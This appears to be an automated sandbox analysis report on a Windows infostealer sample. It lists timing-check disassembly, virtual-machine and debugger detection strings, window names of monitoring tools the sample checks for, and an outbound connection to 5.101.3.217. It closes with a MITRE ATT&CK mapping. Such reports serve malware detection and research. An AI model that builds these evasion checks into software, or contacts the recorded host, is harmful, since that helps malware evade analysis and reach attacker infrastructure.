Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A0737 second address: 71A073D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A073D second address: 71A0741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A0741 second address: 71A07C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e jmp 00007FD13D063726h 0x00000013 and dl, 00000007h 0x00000016 jmp 00007FD13D063720h 0x0000001b test eax, eax 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FD13D06371Eh 0x00000024 sbb al, FFFFFFB8h 0x00000027 jmp 00007FD13D06371Bh 0x0000002c popfd 0x0000002d mov bh, al 0x0000002f popad 0x00000030 je 00007FD1ACDB9162h 0x00000036 pushad 0x00000037 mov edi, 2C794494h 0x0000003c mov eax, edx 0x0000003e popad 0x0000003f mov ecx, 00000000h 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A07C0 second address: 71A07C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A07C4 second address: 71A07CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A07CA second address: 71A0817 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, E565h 0x00000007 pushfd 0x00000008 jmp 00007FD13CB4AF02h 0x0000000d xor ax, 8F78h 0x00000012 jmp 00007FD13CB4AEFBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b inc ecx 0x0000001c jmp 00007FD13CB4AF06h 0x00000021 shr eax, 1 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A0817 second address: 71A081B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A081B second address: 71A0821 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7180E0D second address: 7180E2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD13D06371Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7180E2D second address: 7180E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7180E33 second address: 7180E8C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD13D063723h 0x00000015 or ch, 0000000Eh 0x00000018 jmp 00007FD13D063729h 0x0000001d popfd 0x0000001e jmp 00007FD13D063720h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7190468 second address: 7190498 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov edx, 756D8E92h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FD13CB4AF08h 0x00000014 xchg eax, ebx 0x00000015 pushad 0x00000016 mov dh, ah 0x00000018 pushad 0x00000019 mov dh, 1Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7190498 second address: 7190594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 pushad 0x00000008 call 00007FD13D06371Ch 0x0000000d pop eax 0x0000000e call 00007FD13D063727h 0x00000013 pushfd 0x00000014 jmp 00007FD13D063728h 0x00000019 and ecx, 435D3E98h 0x0000001f jmp 00007FD13D06371Bh 0x00000024 popfd 0x00000025 pop esi 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007FD13D063726h 0x0000002d xchg eax, esi 0x0000002e pushad 0x0000002f mov cx, di 0x00000032 popad 0x00000033 mov esi, dword ptr [ebp+08h] 0x00000036 pushad 0x00000037 mov cx, di 0x0000003a pushfd 0x0000003b jmp 00007FD13D063721h 0x00000040 and eax, 6D01A596h 0x00000046 jmp 00007FD13D063721h 0x0000004b popfd 0x0000004c popad 0x0000004d sub ecx, ecx 0x0000004f jmp 00007FD13D063727h 0x00000054 xchg eax, edi 0x00000055 jmp 00007FD13D063726h 0x0000005a push eax 0x0000005b jmp 00007FD13D06371Bh 0x00000060 xchg eax, edi 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007FD13D063725h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7190594 second address: 719059A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 719059A second address: 71905B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000001h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov esi, 19CC3BA7h 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71905B0 second address: 71905B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71905B6 second address: 71905BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71905BA second address: 71905CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [esi], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71905CC second address: 71905D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71905D0 second address: 71905E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71905E3 second address: 7190630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 mov dh, 8Ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, eax 0x0000000c jmp 00007FD13D06371Ah 0x00000011 cmp ecx, 01h 0x00000014 pushad 0x00000015 mov cl, 75h 0x00000017 jmp 00007FD13D063723h 0x0000001c popad 0x0000001d jne 00007FD1ACDA56D1h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FD13D063725h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C8F second address: 7150C95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C95 second address: 7150CA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD13D06371Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150CA6 second address: 7150CE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 pushad 0x0000000a movzx esi, dx 0x0000000d push edi 0x0000000e pushfd 0x0000000f jmp 00007FD13CB4AF04h 0x00000014 jmp 00007FD13CB4AF05h 0x00000019 popfd 0x0000001a pop eax 0x0000001b popad 0x0000001c push ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150CE8 second address: 7150D01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063725h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150D01 second address: 7150D1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150D1F second address: 7150D23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150D23 second address: 7150D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150DFA second address: 7150E0D instructions: 0x00000000 rdtsc 0x00000002 call 00007FD13D06371Ah 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c mov bh, 77h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150ABF second address: 7150B2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushfd 0x00000006 jmp 00007FD13CB4AF04h 0x0000000b sub esi, 01FE2638h 0x00000011 jmp 00007FD13CB4AEFBh 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FD13CB4AEFBh 0x00000022 and al, FFFFFFFEh 0x00000025 jmp 00007FD13CB4AF09h 0x0000002a popfd 0x0000002b call 00007FD13CB4AF00h 0x00000030 pop esi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B2B second address: 7150B77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063720h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, C5C3h 0x00000011 pushfd 0x00000012 jmp 00007FD13D063728h 0x00000017 jmp 00007FD13D063725h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B77 second address: 7150B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, ebx 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B89 second address: 7150B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B8D second address: 7150B93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B93 second address: 7150B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B99 second address: 7150B9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150B9D second address: 7150BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD13D063723h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150BBC second address: 7150BFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13CB4AEFFh 0x00000009 adc ax, BB8Eh 0x0000000e jmp 00007FD13CB4AF09h 0x00000013 popfd 0x00000014 movzx ecx, bx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebp+08h] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150BFC second address: 7150C00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C00 second address: 7150C1E instructions: 0x00000000 rdtsc 0x00000002 mov al, dl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, cx 0x00000009 popad 0x0000000a and dword ptr [eax], 00000000h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD13CB4AEFFh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C1E second address: 7150C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 18E0D95Ah 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C30 second address: 7150C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7150C34 second address: 7150C4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063725h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 715099A second address: 71509A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71509A0 second address: 71509A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E028D second address: 70E02AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E02AF second address: 70E02B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E02B3 second address: 70E02CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E02CE second address: 70E0302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13D06371Fh 0x00000009 or ax, F9EEh 0x0000000e jmp 00007FD13D063729h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E0302 second address: 70E0310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E0310 second address: 70E0314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E0314 second address: 70E031A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E031A second address: 70E032C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13D06371Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70E032C second address: 70E0330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSpecial instruction interceptor: First address: C69D76 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_005D9980 rdtsc 0_2_005D9980
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003F255D
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F29FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_003F29FF
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_003F255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_003F255D
Source: BkB1ur7aFW.exe, BkB1ur7aFW.exe, 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: BkB1ur7aFW.exe, 00000000.00000003.1880149923.00000000069C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=;E
Source: BkB1ur7aFW.exe, 00000000.00000003.1987503585.000000000178E000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000002.2030658595.00000000017A0000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1987472785.0000000001781000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1988101952.000000000179F000.00000004.00000020.00020000.00000000.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1987783680.0000000001792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll", "w
Source: BkB1ur7aFW.exeBinary or memory string: Hyper-V RAW
Source: BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: BkB1ur7aFW.exe, 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_071103FE Start: 0711041B End: 071104150_2_071103FE
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_07130840 Start: 07130857 End: 071308510_2_07130840
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile opened: NTICE
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile opened: SICE
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeCode function: 0_2_005D9980 rdtsc 0_2_005D9980
Source: BkB1ur7aFW.exe, BkB1ur7aFW.exe, 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ?Program Manager
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: BkB1ur7aFW.exe, 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmp, BkB1ur7aFW.exe, 00000000.00000003.1843607009.00000000073B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.4:49731 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
